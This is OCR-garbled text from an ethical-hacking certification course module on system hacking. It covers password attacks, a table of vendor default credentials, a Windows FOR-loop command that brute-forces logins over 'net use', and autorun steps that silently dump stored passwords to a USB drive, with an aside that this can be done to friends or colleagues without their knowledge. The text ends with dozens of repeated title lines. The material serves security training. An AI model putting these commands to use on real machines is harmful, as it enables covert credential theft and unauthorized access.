980s. T h e t e r m ‫ ״‬d u m p s t e r d iv i n g " r e fe r s t o a n y u s e fu l, g e n e r a l i n f o r m a t i o n t h a t is f o u n d a nd ta ke n fr o m a re as w h e r e it has b e e n d is c a r d e d . T h e se a re a s i n c lu d e tr a s h cans, c u r b s id e c o n t a in e r s , d u m p s t e r s , a n d t h e like, f r o m w h i c h t h e i n f o r m a t i o n can be o b t a i n e d f o r fr e e . C u r io u s a n d / o r m a lic io u s a tt a c k e r s m a y f i n d p a s s w o r d file s , m a n u a ls , s e n s itiv e d o c u m e n t s , r e p o r t s , re c e ip ts , c r e d i t c a rd n u m b e r s , o r d i s k e t t e s t h a t h a ve b e e n t h r o w n a w a y . Module 05 Page 552 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker S im p ly , t h e e x a m i n a t i o n o f w a s t e p r o d u c t s t h a t h a ve b e e n d u m p e d i n t o t h e d u m p s t e r a re a s m a y be h e l p f u l t o a tta c k e r s , a n d t h e r e is a m p le i n f o r m a t i o n t o s u p p o r t t h is c o n c e p t . Such u s e fu l i n f o r m a t i o n w a s d u m p e d w i t h n o t h o u g h t t o w h o s e h a n d s it m a y e n d u p in. T his d a ta can be u tiliz e d b y t h e a t ta c k e r s t o g a in u n a u t h o r i z e d access o n o t h e r s ' c o m p u t e r s y s te m s , o r t h e o b je c t s f o u n d can p r o m p t o t h e r ty p e s o f a tta c k s such as th o s e based o n so c ia l e n g in e e r in g . T H S h o u ld er Surfing '41 ‫ » — י‬S h o u ld e r ‫׳‬ s u r fin g is w h e n an in tru d e r is s t a n d in g in c o n s p ic u o u s ly , but near a l e g i t i m a t e user, w a t c h i n g as t h e p a s s w o r d is e n t e r e d . T h e a t t a c k e r s i m p l y lo o k s a t e i t h e r t h e u s e r's k e y b o a r d o r s c re e n w h i l e he o r she is lo g g in g in, a n d w a t c h e s t o see if t h e u se r is s ta r in g a t t h e d e s k f o r a p a s s w o r d r e m i n d e r o r t h e a c tu a l p a s s w o r d . T his can be p o s s ib le o n l y w h e n t h e a t t a c k e r is p h y s ic a lly close t o t h e t a r g e t . This t y p e o f a t t a c k can also o c c u r in a g r o c e r y s to r e c h e c k o u t lin e w h e n a p o t e n t i a l v i c t i m is s w i p i n g a d e b i t ca rd a n d e n t e r i n g t h e r e q u i r e d PIN. M a n y o f th e s e P e r s o n a l I d e n t i f i c a t i o n N u m b e r s a re o n l y f o u r d ig its lon g. E a v e s d r o p p i n g r e fe r s t o t h e a c t o f s e c r e tly lis te n in g t o s o m e o n e 's c o n v e r s a t i o n . P a s s w o rd s can be d e t e r m i n e d by s e c r e tly lis te n in g t o t h e p a s s w o r d e x c h a n g e s . If t h e h a c k e r fa ils t o g e t y o u r p a s s w o r d b y g u e ssin g , t h e r e are o t h e r w a y s he o r she can t r y t o g e t it. " P a s s w o r d s n i f f i n g " is an a lt e r n a t i v e used b y t h e h a c k e rs t o g e t t h e i r t a r g e t p a s s w o r d s . M o s t o f t h e n e t w o r k s use b r o a d c a s t t e c h n o l o g y , w h i c h m e a n s t h a t e v e r y m e ssa g e t h a t a c o m p u t e r o n t h e n e t w o r k t r a n s m i t s can be re a d b y e a c h a n d e v e r y c o m p u t e r c o n n e c t e d o n t h a t n e t w o r k . In p r a c tic e , e x c e p t t h e r e c i p i e n t o f t h e m essa ge , all o t h e r c o m p u t e r s w i ll n o tic e t h a t t h e m e s s a g e is n o t i n t e n d e d f o r t h e m , a n d i g n o r e it. H o w e v e r , c o m p u t e r s can be p r o g r a m m e d t o lo o k a t e v e r y m e s s a g e t r a n s m i t t e d by a s p e c ific c o m p u t e r o n t h e n e t w o r k . In t h is w a y , o n e can lo o k a t m essa ge s t h a t a re n o t in t e n d e d f o r t h e m . H a c ke rs h a v e t h e p r o g r a m s t o d o th is , a n d t h e n scan all t h e m essa ge s t r a v e r s e d o n t h e n e tw o rk lo o k in g fo r th e p assw ord. You m a y e n d u p g iv in g y o u r p a s s w o r d t o t h e a t t a c k e r if y o u a re lo g g in g i n t o a c o m p u t e r acro ss a n e tw o rk , and so m e c o m p u te rs on th e n e tw o r k have b een c o m p ro m is e d th is w ay. U sing t h is p a s s w o r d s n i f f i n g t e c h n i q u e , h a c k e rs h a v e c o lle c te d th o u s a n d s o f p a s s w o r d s b y b r e a k in g i n t o t h e c o m p u t e r s t h a t a re c o n n e c t e d o n a h e a v ily u sed n e t w o r k . Social E n g in e e rin g In c o m p u t e r s e c u r ity , social e n g in e e r in g is t h e t e r m t h a t r e p r e s e n ts a n o n - t e c h n i c a l k in d o f i n t r u s io n . T y p ic a lly , t h is re lie s h e a v ily o n h u m a n i n t e r a c t i o n a n d o f t e n in v o lv e s t r i c k in g o t h e r p e o p le i n t o b r e a k in g n o r m a l s e c u r it y p r o c e d u r e s . A social e n g in e e r r u n s a " c o n g a m e " t o b r e a k t h e s e c u r it y p r o c e d u r e s . For e x a m p le , an a t t a c k e r u sin g social e n g in e e r in g t o b r e a k i n t o a c o m p u t e r n e t w o r k w o u l d t r y t o g ain t h e t r u s t o f s o m e o n e w h o is a u t h o r i z e d t o access t h e n e t w o r k , a n d t h e n t r y t o e x t r a c t t h e i n f o r m a t i o n t h a t c o m p r o m i s e s t h e n e t w o r k s e c u r ity . Module 05 Page 553 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Social e n g in e e r in g is t h e r u n - t h r o u g h o f p r o c u r i n g c o n f i d e n t i a l i n f o r m a t i o n b y d e c e iv in g o r s w a y in g p e o p le . A n a t t a c k e r can m i s r e p r e s e n t h im s e l f as a u s e r o r s y s te m a d m i n i s t r a t o r in o r d e r t o o b t a i n t h e p a s s w o r d f r o m a user. It is n a t u r a l f o r p e o p le t o be h e l p f u l a n d t r u s t i n g . A n y p e r s o n g e n e r a lly m a k e s an e f f o r t t o b u ild a m i c a b l e r e la t io n s h ip s w i t h his o r h e r f r i e n d s a nd c o lle a g u e s . Social e n g in e e r s t a k e a d v a n ta g e o f t h is t e n d e n c y . A n o t h e r t r a i t o f social e n g in e e r in g relie s o n t h e i n a b i l i t y o f p e o p le t o k e e p u p w i t h a c u lt u r e t h a t r e lie s h e a v i l y o n i n f o r m a t i o n t e c h n o l o g y . M o s t p e o p le are n o t a w a r e o f t h e v a lu e o f t h e i n f o r m a t i o n t h e y possess a n d f e w a re ca re le ss a b o u t p r o t e c t i n g it. A t t a c k e r s t a k e a d v a n ta g e o f t h is fa c t fo r th e i n t r u s io n . H a b itu a lly , social e n g in e e r s s e a rch d u m p s te rs fo r v a lu a b le i n f o r m a t i o n . A social e n g in e e r w o u l d h a ve a t o u g h e r t i m e g e t t i n g t h e c o m b i n a t i o n t o a safe, o r e v e n t h e c o m b i n a t i o n t o a h e a lt h c l u b lo c k e r , t h a n a p a s s w o r d . T h e b e s t d e f e n s e is t o e d u c a te , t r a i n , a n d c r e a te a w a re n e s s . K ey b o ard Sniffing I K e y b o a rd s n if fin g a llo w s y o u t o in te rp re t th e p a s s w o r d as t h e t a r g e t e n t e r s t h e k e y s tr o k e s u sin g k e y lo g g e r s . Module 05 Page 554 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Default Passwords J A default password is a password supplied by the m anufacturer w ith new equipm ent that is password protected Online tools to search default passwords: The Default Password List http://cirt.net http://default-password.info h ttp :/ / w w w .d e fa u ltp a s s w o rd .u s http://www.passwordsdatabase.com https://w3dt.net h t tp :/ / w w w .v iru s .o rg *ccrv.8■***: 000‫ יי‬B 8I *!'Connect * « » wm < doscic < 0000/4007 8 http://open-sez.me http://securityoverride.org • Tot•! % t U ‫ ׳‬i 7.24$ ■NtowlHinib(‫׳‬ : d n * 0 9 a d jrM 2 http://www.routerpasswords.com http://www.fortypoundhead.com http://securityoverride.org Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. ' A D efault P assw o rd s S o u rc e : h t t p : / / s e c u r i t y o v e r r i d e . o r g D e f a u lt p a s s w o r d s a re p a s s w o r d s s u p p lie d b y m a n u f a c t u r e r s w i t h n e w e q u i p m e n t . U s u a lly t h e d e f a u l t p a s s w o r d p r o v id e d by t h e m a n u f a c t u r e r s f o r p a s s w o r d p r o t e c t e d d e v ic e s a llo w s t h e d e v ic e t o be a ccessed d u r in g its in itia l s e tu p . O n l in e t o o l s t h a t can be used t o s e a rch f o r d e f a u l t p a s s w o r d s in c lu d e : 0 h ttp ://c irt.n e t 0 h ttp ://d e fa u lt-p a s s w o rd .in fo 0 h ttp ://w w w .d e fa u ltp a s s w o rd .u s 0 h ttp ://w w w .p a s s w o rd s d a ta b a s e .c o m 0 h ttp s ://w 3 d t.n e t 0 h ttp ://w w w .v iru s .o rg 0 h ttp ://o p e n -s e z .m e 0 h ttp ://s e c u rity o v e rrid e .o rg 0 h ttp ://w w w .ro u te rp a s s w o rd s .c o m 0 h ttp ://w w w .fo rty p o u n d h e a d .c o m Module 05 Page 555 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker FIGURE 5.10: Default Password Screenshot Access User- Type name 7 0 0 0 /6 0 0 0 /3 5 0 0 /2 5 0 0 Telnet Debug Synnet CoreBuilder 7 0 0 0 /6 0 0 0 /3 5 0 0 /2 5 0 0 Telnet Tech Tech 3COM HiPerARC v4.1.x Telnet Adm (none) 3COM LANplex 2500 Telnet Debug Synnet 3COM LANplex 2500 Telnet Tech Tech 3COM LinkSwitch 2 00 0 /2 7 0 0 Telnet Tech Tech Huawei E960 A dm in A dm in 3COM NetBuilder SNMP N e tbu ild er M u lti A dm in (none) 5x0 Telnet n/a PASSWORD 2200 Telnet debug Synnet 2700 Telnet tech Tech M u lti a d m in ttd a d m in ttd Vendor M odel Version 3COM CoreBuilder 3COM 3COM 3COM 3COM 3COM 3COM Office Connect ISDN Routers SuperStack II Switch SuperStack II Switch OfficeConnect 812 ADSL Password ILMI TABLE 5.1: Online Tools To Search Default Password Module 05 Page 556 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker M an u al Passw ord C rack in g (G uessing) Frequency of attacks is less r Eu 1 E !! The failure rate is high Create a list of possible passwords Key in each password, until correct password is discovered Rank passwords from high probability to low a I ‫פ‬ Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. M an u al P assw o rd C ra c k in g (G u essin g ) M anual passw ord c r a c k in g encom passes a tte m p tin g to log on w ith d iffe re n t p a s s w o r d s . G u e s sin g is t h e k e y e l e m e n t o f m a n u a l p a s s w o r d c ra c k in g . T h e p a s s w o r d is t h e key v a lu e o f d a ta t h a t is n e e d e d t o access t h e s y s te m . M o s t p a s s w o r d s can be c r a c k e d u sin g d iffe re n t e s c a l a t io n p r iv ile g e s , e x e c u t in g a p p lic a tio n s , h id in g file s, a nd c o v e r in g tra c k s . A t t a c k e r s t r y m a n y a t t e m p t s t o c ra c k p a s s w o r d s t o i n t r u d e i n t o a t a r g e t 's s y s te m . P a s s w o rd s can be c ra c k e d m a n u a l ly o r u sin g s o m e a u t o m a t e d t o o l s , m e t h o d s , a n d a l g o r i t h m s . P a s s w o rd c ra c k in g can be a u t o m a t e d u sin g a s im p le FOR lo o p also. M a n u a l p a s s w o r d c ra c k in g in v o lv e s d i f f e r e n t a t t e m p t s t o log in t h e f o l l o w i n g w a y s : 0 Find a v a lid u se r 0 C re a te a list o f p o s s ib le p a s s w o r d s 0 Rank p a s s w o r d s f r o m h igh p r o b a b i l i t y t o l o w 0 Key in e ach p a s s w o r d , u n til t h e c o r r e c t p a s s w o r d is d is c o v e r e d A h a c k e r can also c r e a te a s c r ip t file t h a t tr ie s e a c h p a s s w o r d in a list. Still t h is is still c o n s id e r e d m a n u a l c ra c k in g . T h e fa i lu r e r a te o f th is t y p e o f a t t a c k is hig h. Module 05 Page 557 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker M an u a l P assw o rd C ra c k in g A lgorithm In its s i m p l e s t f o r m , p a s s w o r d g u e s s in g can be a u t o m a t e d u sin g a s im p le FOR lo o p . In t h e e x a m p le t h a t f o l lo w s , an a t t a c k e r c r e a te s a s im p le t e x t file w i t h u s e r n a m e s a n d p a s s w o r d s t h a t a re i t e r a t e d u s in g t h e FOR l o o p . T h e m a in FOR lo o p can e x t r a c t t h e u s e r n a m e s a n d p a s s w o r d s f r o m t h e t e x t f i l e t h a t se rv e s as a d i c t i o n a r y as it i t e r a t e s t h r o u g h e v e r y line : [file: credentials.txt] administrator "" administrator password administrator administrator [Etc. ] F ro m a d i r e c t o r y t h a t can access t h e t e x t file , t h e c o m m a n d is t y p e d as f o l lo w s : c:>FOR /F 1tokens=l,2* ‫% ״‬i in (credentials .txt) A 1 More? do net use victim.comlPC$ %j /u:victim.com%iA More? 2 » n u l A More? && echo %time% %date% » outfile.txtA More? && echo Wvictim.com acct: %i pass: %j » outfile.txt c:>type outfile.txt T h e o u t f i l e . t x t c o n t a i n s t h e c o r r e c t u s e r n a m e a nd p a s s w o r d if t h e u s e r n a m e a n d p a s s w o r d in c r e d e n t i a l s . t x t a re c o r r e c t . A n o p e n s e s s io n can be e s ta b lis h e d w i t h t h e v i c t i m s e r v e r u s in g t h e a t t a c k e r 's s y s te m . Module 05 Page 558 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker _ A utom atic Passw ord C rack in g A lgorithm Find the algorithm used for encryption Create a list of the possible passwords CEH Verify whether there is a match for each user ID Repeat the cycle until the correct password is discovered Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. A utom atic P assw o rd C ra c k in g A lg o rith m As s e c u r it y a w a r e n e s s in c re a s e d , m o s t s y s te m s b e g a n r u n n i n g p a s s w o r d s t h r o u g h s o m e t y p e o f a l g o r i t h m t o g e n e r a t e a hash. This hash is u s u a lly m o r e t h a n j u s t r e a r r a n g in g t h e o rig in a l p a s s w o r d . It is u s u a lly a o n e - w a y h a s h . T h e o n e - w a y hash is a s tr in g o f c h a r a c te r s t h a t c a n n o t b e r e v e rs e d i n t o its o rig in a l te x t . H o w e v e r , t h e v u l n e r a b i l i t y d o e s n o t a ris e f r o m t h e h a s h in g p ro ce ss, b u t f r o m p a s s w o r d s to ra g e . T h e p a s s w o r d t h a t is s to r e d a t t h e t i m e o f a u t h e n t i c a t i o n is n o t d e c r y p t e d b y m o s t o f th e s y s te m s . Such s y s te m s s to r e o n l y o n e - w a y hashes. D u r in g t h e local log in p ro ce ss, t h e p a s s w o r d e n t e r e d is r u n t h r o u g h t h e a l g o r i t h m g e n e r a t in g a o n e - w a y hash a n d c o m p a r i n g i t t o t h e hash s t o r e d o n t h e s y s te m . If t h e y a re f o u n d t o be s im ila r , it is a s s u m e d t h a t t h e p r o p e r p a s s w o r d w a s used. T h e r e f o r e , all t h a t an a t t a c k e r has t o d o in o r d e r t o c ra c k a p a s s w o r d is t o g e t a c o p y o f t h e o n e w a y hash s t o r e d o n t h e s e rv e r, a nd t h e n use t h e a l g o r i t h m t o g e n e r a t e his o r h e r o w n hash u n t i l he o r she g e ts a m a tc h . M o s t s y s t e m s — M i c r o s o f t , UNIX, a n d N e t w a r e — h a ve p u b lic ly a n n o u n c e d t h e i r h a s h in g a l g o r i t h m s . A t t a c k e r s can use a c o m b i n a t i o n o f a t t a c k m e t h o d s t o r e d u c e t h e t i m e in v o lv e d in c r a c k in g a p a s s w o r d . T h e I n t e r n e t p r o v id e s f r e e w a r e p a s s w o r d c r a c k e rs f o r NT, N e t w a r e , a n d UNIX. Module 05 Page 559 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker T h e r e a re p a s s w o r d lists t h a t can be fe d t o th e s e c ra c k e rs t o c a r r y o u t a d i c t i o n a r y a t t a c k . In its s i m p l e s t f o r m , a u t o m a t i o n in v o lv e s f i n d i n g a v a lid u s e r a n d t h e p a r t i c u l a r e n c r y p t i o n a l g o r i t h m b e in g used , o b t a i n i n g e n c r y p t e d p a s s w o r d s , c r e a t in g a list o f all p o s s ib le p a s s w o r d s , e n c r y p t i n g e ach w o r d , a n d c h e c k in g f o r a m a t c h f o r e ach u s e r ID k n o w n . T his p ro c e s s is r e p e a t e d u n t i l t h e d e s ire d re s u lts a re o b t a i n e d o r all o p t i o n s a re e x h a u s t e d . A u t o m a t i c p a s s w o r d c r a c k in g a l g o r i t h m s s h o u ld in c lu d e t h e f o l l o w i n g s te p s: e Find a v a lid u se r e Find e n c r y p t i o n a l g o r i t h m used 0 O b t a in e n c r y p t e d p a s s w o r d s Q C re a te a list o f p o s s ib le p a s s w o r d s Q E n c r y p t e ach w o r d © See if t h e r e is a m a tc h f o r e ach u s e r ID P erfo rm in g A u to m ated P assw o rd G u e ssin g If t h e a t t a c k e r fa ils in a m a n u a l a t t a c k , h e o r she can c h o o s e t o a u t o m a t e t h e pro ces s. T h e r e a re s e v e ra l fr e e p r o g r a m s t h a t can assist in t h is e f f o r t . S o m e o f th e s e f r e e p r o g r a m s are Leg io n, Jack t h e R ip p e r, N etB IO S A u d i t i n g T o o l (NAT), e tc . T h e s i m p l e s t o f th e s e a u t o m a t i o n m e t h o d s ta k e a d v a n ta g e o f t h e n e t c o m m a n d . T his in v o lv e s a s im p le l o o p u sin g t h e N T / 2 0 0 0 s h ell f o r c o m m a n d . All t h e a t t a c k e r has t o d o is t o c r e a te a s im p le u s e r n a m e a n d p a s s w o r d file . He o r sh e can t h e n r e f e r e n c e t h i s file w i t h i n a FOR c o m m a n d . C:> FOR /F "token=l, 2*" %i in (credentials.txt) do net use targetlPC$ %i /u: %j A u t o m a t e d p a s s w o r d a tta c k s can be c a te g o r iz e d as f o l lo w s : © A s im p le d ic t io n a r y a t ta c k in v o lv e s lo a d in g a d i c t i o n a r y file (a t e x t file f u ll o f d i c t i o n a r y w o r d s ) i n t o a c ra c k in g a p p li c a t i o n such as L O p h tC ra c k o r J o h n t h e R ip p e r , a n d r u n n i n g it a g a in s t u se r a c c o u n ts t h a t t h e a p p li c a t i o n loc a te s . D i c t i o n a r y a tta c k s a re m o r e e f f e c t i v e w i t h lo n g w o r d s . Q T h e b r u t e f o r c e m e t h o d is t h e m o s t in c lu s iv e , a lt h o u g h s lo w . U s u a lly it tr i e s e v e r y p o s s ib le l e t t e r a n d n u m b e r c o m b i n a t i o n in its a u t o m a t e d e x p l o r a t i o n . 0 A h y b r id a p p r o a c h is o n e t h a t c o m b in e s f e a t u r e s o f b o t h m e t h o d s . It u s u a lly s ta r t s w i t h a d ic t io n a r y , a n d t h e n tr i e s c o m b i n a t i o n s such as t w o w o r d s t o g e t h e r o r a w o r d a nd n um be rs. Users t e n d t o h a ve w e a k p a s s w o r d s b e c a u s e t h e y d o n o t k n o w w h a t c o n s t i t u t e s a s t r o n g p a s s w o r d a n d , t h e r e f o r e , d o n o t k n o w h o w t o c r e a te s t r o n g p a s s w o r d s f o r t h e i r a c c o u n ts . As s h o w n , t h i s lea ves p a s s w o r d s o p e n t o a tta c k . Module 05 Page 560 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Stealing P assw ords Using USB D rive 1 Attacker c EH U rtifM User itkMjl IlMhM Passwords PassView is executed in th e background and passwords w ill be stored in th e .TXT files in th e USB drive Inse rt th e USB drive and th e autorun w in d o w w ill pop-up ( if enabled) C ontents o f launch, bat D ownload PassView, a start p s p v .exe/stext p s p v .txt password hacking to o l Create autorun.inf in USB drive Copy th e downloaded files to [autorun] e n = l a u n c h .b a t USB drive Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. £ W < S tealing P a ssw o rd s U sing USB D rives ‫>־‬ z J S te a lin g p a s s w o r d s u sin g a USB d r i v e is a p h y s ic a l a p p r o a c h f o r h a c k in g p a s s w o r d s sto re d in a c o m p u te r. A tta cke rs can ste a l passw ord s u s in g a USB d r iv e and d iffe re n t a p p lic a tio n s . P e o p le w h o h a ve m u l t i p l e o n l i n e a c c o u n ts u s u a lly s to r e t h e i r u s e r n a m e s and p a s s w o r d s as a b a c k u p t o use if t h e y f o r g e t t h e m . You can r e c o v e r o r s te a l such c r e d e n t i a l s u sin g a USB d riv e . T h e p h y s ic a l a p p r o a c h m a t t e r s a l o t f o r h a c k in g p a s s w o r d s . O n e can ste a l p a s s w o r d s u sin g a USB d r iv e a n d a p p lic a tio n s . This m e t h o d is a p p lic a b le f o r h a c k in g s t o r e d p a s s w o r d s in a n y c o m p u t e r . M o s t o f t h e p e o p le s ig n in g u p f o r a la rg e n u m b e r o f w e b s i t e s u s u a lly s to r e t h e i r passw ords on th e c o m p u te r in o r d e r t o re m e m b e r th e m . O n e can t r y re c o v e rin g th e m a u t o m a t i c a l l y u sin g a USB d riv e . T his r e q u ir e s p lu g g in g t h e USB in a n y p o r t o f t h e c o m p u t e r in w h i c h t h e p a s s w o r d s h a v e b e e n s t o r e d . T his t r i c k is a p p lic a b le f o r W i n d o w s XP, W i n d o w s 7, W i n d o w s V is ta , a n d W i n d o w s 2 0 0 0 . All t h e a p p li c a t i o n s i n c lu d e d a re p o r t a b l e a n d l ig h t e n o u g h t h a t t h e y can be d o w n l o a d e d in th e USB d is k in f e w se c o n d s . You can also h a c k s t o r e d M e s s e n g e r p a s s w o r d s . U sing t o o l s a n d a USB p e n d r i v e y o u can c r e a te a r o o t k i t t o h a c k p a s s w o r d s f r o m t h e t a r g e t c o m p u t e r . S te a lin g p a s s w o r d s u s in g a USB d e v ic e is c a r r ie d o u t w i t h t h e h e lp o f t h e f o l l o w i n g s te p s : 1. You n e e d a p a s s w o r d h a c k in g t o o l Module 05 Page 561 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker 2. C o p y t h e d o w n l o a d e d .exe file s o f p a s s w o r d h a c k in g t o o l s t o USB d riv e . 3. C re a te a n o t e p a d d o c u m e n t a n d p u t t h e f o l l o w i n g c o n t e n t o r c o d e in t h e n o t e p a d [a u to ru n ] e n = la u n c h .b a t A f t e r w r i t i n g th is c o n t e n t i n t o N o t e p a d , save t h e d o c u m e n t as a u t o r u n . i n f a n d c o p y th is f ile t o t h e USB d riv e . 4. O pen N o te p a d and w rite th e fo llo w in g c o n te n t in to N otep ad : s t a r t p s p v . e x e / s t e x t p s p v .t x t A f t e r t h a t , save file as la u n c h . b a t a n d c o p y t h is f ile t o t h e USB d r iv e 5. 6. In s e r t t h e USB d r i v e a n d t h e a u t o r u n w i n d o w p o p - u p ( if e n a b le d ) . A p a s s w o r d - h a c k i n g t o o l is e x e c u t e d in t h e b a c k g r o u n d a nd p a s s w o r d s can be s t o r e d in t h e .TXT file s in t h e USB d riv e . In t h i s w a y , y o u can c r e a te y o u r o w n USB p a s s w o r d r e c o v e r y t o o l k i t a n d use it t o ste a l sto re d p a s s w o r d s o f y o u r f r i e n d s o r c o lle a g u e s w i t h o u t t h e k n o w l e d g e o f t h e th e p e r s o n . This p ro c e s s ta k e s o n l y a f e w s e c o n d s t o r e t r i e v e p a s s w o r d s . Attacker FIGURE 5.11: Stealing Passwords Using USB Drives Module 05 Page 562 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Stealing P assw ords Using K eyloggers CEH J Keyloggers provide an easiest and most effective means of stealing a all victinVs user names and passwords J If an attacker is successful in infecting a victim's machine with a Trojan that have keylogging features he can instruct the Trojan server to log and send back all user credentials to his machine Attacker infects victim’s local PC with a software keylogger Victim logs on to the domain server with his credentials © ................... > .........& Attacker Keylogger sends login credentials to hacker . Victim Domain Server Attacker gains access to domain server Copyright © by E&Coincil. All Rights Reserved. Reproduction isStrictly Prohibited. S tealing P a ssw o rd s U sing K ey lo g g ers W h e n e v e r an a t t a c k e r n e e d s t o c ra c k s o m e t h i n g , he o r she u s u a lly t h i n k s a b o u t th e p o s s ib le l o o p h o l e s in t h e w h o l e p ro ce ss . P a s s w o rd s a re t h e p ie ce o f d a ta used t o access an a c c o u n t o r a s y s te m . C h o o s in g c o m p le x p a s s w o r d s m a k e s y o u r a c c o u n ts s e c u r e a n d t h e j o b o f t h e a t t a c k e r d if f i c u l t . A c o m p le x p a s s w o r d m a k e s t h e a tt a c k e r 's j o b d i f f i c u l t b u t n o t im p o s s ib le . P a s s w o rd s a re t h e p ie c e o f d a ta t o be s u b m i t t e d t o a s y s te m o r a p p li c a t i o n t o g ain access t o it. P a s s w o rd s a re u s u a lly e n t e r e d t h r o u g h t h e k e y b o a r d . H e n c e , if an a t t a c k e r has s o f t w a r e o r a m e c h a n is m t h a t can log t h e k e y s tr o k e s a n d se nd t h e r e p o r t t o h im o r h er, t h e n t h e a t t a c k e r can d e t e r m i n e t h e p a s s w o r d s easily. T h e p r o g r a m s t h a t a l l o w t h e m t o d o th is a re k e y lo g g e rs , a k in d o f m a l w a r e . K e y lo g g e rs can e x p o s e all t h e k e y s tr o k e s e n t e r e d by t h e t a r g e t in c lu d in g u s e r n a m e s a n d p a s s w o r d s f o r a n y w e b s ite s . A r e m o t e k e y lo g g e r can g iv e an a t t a c k e r access n o t o n l y t o y o u r e m a il a n d o n l i n e a c c o u n ts , b u t it can c o m p r o m i s e y o u r f i n a n c ia l d e ta ils as w e ll. K e y lo g g e rs a re u sed by p e o p le t o f i n d a c e r ta in p ie c e o f i n f o r m a t i o n such as a u s e r n a m e o r p a s s w o r d . T h e p ic t o r ia l r e p r e s e n t a t i o n c le a rly e x p la in s t h e w a y a t ta c k e r s ste a l p a s s w o r d s using k e y lo g g e rs . Module 05 Page 563 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Domain Server Attacker gains access to domain server FIGURE 5.12: Stealing Passwords Using Keyloggers W hen s te a lin g p a s s w o r d s , t h e k e y lo g g e r . W h e n t h e v i c t i m a t t a c k e r f i r s t i n f e c ts t h e v i c t i m ' s local PC w i t h a s o ftw a re logs o n t o t h e d o m a i n s e r v e r w i t h his o r h e r c r e d e n tia ls , t h e k e y lo g g e r a u t o m a t i c a l l y s e n d s lo g in c r e d e n t i a l s (u s e r n a m e , p a s s w o r d s ) t o t h e a t t a c k e r w i t h o u t t h e k n o w l e d g e o f t h e v i c t i m . O n c e t h e a t t a c k e r g e ts t h e v i c t i m ' s lo g in c r e d e n tia ls , he o r she logs o n t o t h e d o m a i n s e r v e r a n d m a y p e r f o r m a n y a c tio n . Module 05 Page 564 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
